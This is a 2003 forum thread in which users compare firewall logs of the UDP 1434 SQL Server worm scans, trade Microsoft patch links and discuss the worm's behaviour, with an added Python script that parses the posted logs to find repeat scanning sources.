reply to Link Logger
Re: New Worm - UDP 1434 - SQL Server Monitor??
I've seen 5 of these scans in the last 30 or so minutes, mostly from the United Kingdom. It's not affecting my connection at all, really, but it's interesting to see how it develops.
-- Mors Principium Est.

Re: New Worm - UDP 1434 - SQL Server Monitor?? foxsteve
Port 4662 is for EDONKEY2000
»www.seifried.org/security/ports/···662.html

said by TeenTech$:
Port 4662 is for EDONKEY2000
The RIAA strikes back!
-- Take my advice, I'm not using it!

reply to Link Logger
Not getting anything on 4662, but have a handful on 1433 in addition to all the 1434's.

ircgeeks | reply to TeenTech$
Does anyone have the link to the MS hotfix for this?

Link Logger
It's included in SP3
»www.microsoft.com/sql/downloads/2000/sp3.asp
Blake

reply to Link Logger
Port 4662 I believe is normally used by the edonkey p2p client or server. If you use this then traffic on that port is normal after closing the app; if you don't use it but do have a dynamic IP you might have just gotten the IP of someone else who uses it. In any case I'd try to ditch the IP as soon as possible if you can. When I first got the IP I've got now (Sept 2001) I guess the person who had it before me ran an edonkey client server, and to put it lightly I received about 50,000 hits minimum per day on ports 4662 tcp and 4665 udp for the first 3 months; my router logs were about 250MB weekly lol

BOFH5 | reply to Link Logger
LINK
»www.microsoft.com/technet/securi···-039.asp

robre | reply to Link Logger
HP.com hit: vcsolap2.vcd.hp.com
I hope that this is a new one. The others are 6 months old+.

reply to Rockster
Just turned my log back on and have already been hit three times in less than five minutes. Looks like we're in for one hell of a time.

ircgeeks
I am getting killed. It even took down the DNS of one of my co-located servers. I am on the phone with their netadmin now and he is trying to download the patches and service packs at home so he can burn them and drive to the colo to install them.
-- "I feel sorry for people who don't drink. When they wake up in the morning, that's as good as they're going to feel all day." - Frank Sinatra

reply to spectre84
Some detailed description of how it operates here: »www.nextgenss.com/advisories/mssql-udp.txt

foxsteve | reply to TeenTech$
I do not distribute copyrighted material and do not use Edonkey2000, Kazaa, Napster or Morpheus, but I use a dynamic IP now.
[text was edited by author 2003-01-25 04:34:44]
I reconnected my PC to the server and no longer have alerts about port 4662. Thank you for the help.
[text was edited by author 2003-01-25 05:01:13]

ircgeeks | reply to ircgeeks
Service packs to get: we are kind of confused.
sql2kasp3.exe 44598 KB
sql2ksp3.exe 56435 KB
One is the database, one is the analysis server. Do we need both to fix this problem?
-- "I feel sorry for people who don't drink. When they wake up in the morning, that's as good as they're going to feel all day." - Frank Sinatra

Link Logger | reply to spectre84
I am starting to see a couple of double hits, meaning that I am seeing a second hit from the same IP address. For example
Jan 25, 2003 06:27:56.560 UTC - (UDP) 207.178.1.10 : 1189 >>> 68.144.129.175 : 1434
Jan 25, 2003 09:05:41.690 UTC - (UDP) 207.178.1.10 : 1189 >>> 68.144.129.175 : 1434
and
Jan 25, 2003 06:25:03.521 UTC - (UDP) 129.59.218.33 : 1079 >>> 68.144.129.175 : 1434
Jan 25, 2003 07:45:48.177 UTC - (UDP) 129.59.218.33 : 1079 >>> 68.144.129.175 : 1434
which somewhat implies that these systems have been going hard for a while. Glad I'm not paying the bandwidth bill for these guys.
Going through the list of systems that have scanned me, it's sad that some of these guys didn't know better, as they are so-called leaders in the high tech sector.
Blake

robre | reply to Link Logger
intulsa, could you put up text rather than a graphic of that honeypot grab?

Wildcatboy | reply to Link Logger
Looking at the packets I'm receiving, source ports vary; this excludes the possibility of the mentioned attack from port 1434 to 1434. At least this is not the first attempt by the worm. To see what else is done, we certainly need a honeypot.
I have a feeling too that the worm is using the heap buffer overflow to run code on the server and then installs itself and does more.
The initial attempt is a DCE RPC protocol ping: seq_num: 16843009 to UDP port 1434.
-- You can catch the Devil, but you can't hold him long.
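Both Link Logger's "double hit" observation and Wildcatboy's point that source ports vary can be checked mechanically against the log format Link Logger posted. The script below is an added example, not code from this thread or from Link Logger's product: it parses lines in that format, keeps only UDP traffic to port 1434, and reports for each source IP the hit count, the distinct source ports seen, and the seconds between its first and last hit. The sample input is the four lines from Link Logger's post plus one constructed TCP 1433 line (not from the thread) to show the filter ignoring it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches the firewall log format posted in this thread, e.g.
# "Jan 25, 2003 06:27:56.560 UTC - (UDP) 207.178.1.10 : 1189 >>> 68.144.129.175 : 1434"
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{3}) UTC - "
    r"\((?P<proto>[A-Z]+)\) (?P<src>[\d.]+) : (?P<sport>\d+) >>> "
    r"(?P<dst>[\d.]+) : (?P<dport>\d+)$"
)

def parse_line(line):
    """Return a dict for one log line, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S.%f"),
        "proto": m["proto"],
        "src": m["src"], "sport": int(m["sport"]),
        "dst": m["dst"], "dport": int(m["dport"]),
    }

def summarize(lines, proto="UDP", dport=1434):
    """Group hits to proto/dport by source IP: hit count, distinct source
    ports, and seconds between the first and last hit from that source."""
    by_src = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["proto"] == proto and rec["dport"] == dport:
            by_src[rec["src"]].append(rec)
    summary = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        summary[src] = {
            "count": len(recs),
            "sports": sorted({r["sport"] for r in recs}),
            "span_s": (recs[-1]["ts"] - recs[0]["ts"]).total_seconds(),
        }
    return summary

def repeat_sources(summary):
    """Sources seen more than once, i.e. Link Logger's 'double hits'."""
    return sorted(s for s, v in summary.items() if v["count"] > 1)

# Four lines from Link Logger's post plus one constructed TCP 1433 line.
SAMPLE_LINES = [
    "Jan 25, 2003 06:27:56.560 UTC - (UDP) 207.178.1.10 : 1189 >>> 68.144.129.175 : 1434",
    "Jan 25, 2003 09:05:41.690 UTC - (UDP) 207.178.1.10 : 1189 >>> 68.144.129.175 : 1434",
    "Jan 25, 2003 06:25:03.521 UTC - (UDP) 129.59.218.33 : 1079 >>> 68.144.129.175 : 1434",
    "Jan 25, 2003 07:45:48.177 UTC - (UDP) 129.59.218.33 : 1079 >>> 68.144.129.175 : 1434",
    "Jan 25, 2003 06:30:00.000 UTC - (TCP) 10.0.0.5 : 3456 >>> 68.144.129.175 : 1433",
]

if __name__ == "__main__":
    result = summarize(SAMPLE_LINES)
    for src, info in result.items():
        print(src, info)
    print("repeat sources:", repeat_sources(result))
```

On the thread's own lines this reports both sources twice, each reusing the same source port, with gaps of roughly 2.6 and 1.3 hours between their hits.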
reply to robre
said by robre:
intulsa, could you put up text rather than a graphic of that honeypot grab?
Edit: Previous attempt dropped some lines
[text was edited by author 2003-01-25 04:53:11]

jig
01:47:40pig: IP[Src=195.167.178.244 Dst=24.55.48.160 UDP spo=03194 dpo=01434]}S07>R06nD
01:42:45pig: IP[Src=157.238.135.147 Dst=24.55.48.160 UDP spo=02160 dpo=01434]}S07>R06nD
01:42:02pig: IP[Src=213.132.200.220 Dst=24.55.48.160 UDP spo=04948 dpo=01434]}S07>R06nD
01:42:00pig: IP[Src=152.160.43.242 Dst=24.55.48.160 UDP spo=03361 dpo=01434]}S07>R06nD
01:34:11pig: IP[Src=63.95.45.103 Dst=24.55.48.160 UDP spo=44927 dpo=01434]}S07>R06nD
01:31:48pig: IP[Src=138.23.142.87 Dst=24.55.48.160 UDP spo=02334 dpo=01434]}S07>R06nD
01:31:26pig: IP[Src=212.116.179.158 Dst=24.55.48.160 UDP spo=03295 dpo=01434]}S07>R06nD
01:30:22pig: IP[Src=149.142.75.40 Dst=24.55.48.160 UDP spo=03761 dpo=01434]}S07>R06nD
[text was edited by author 2003-01-25 04:50:24]
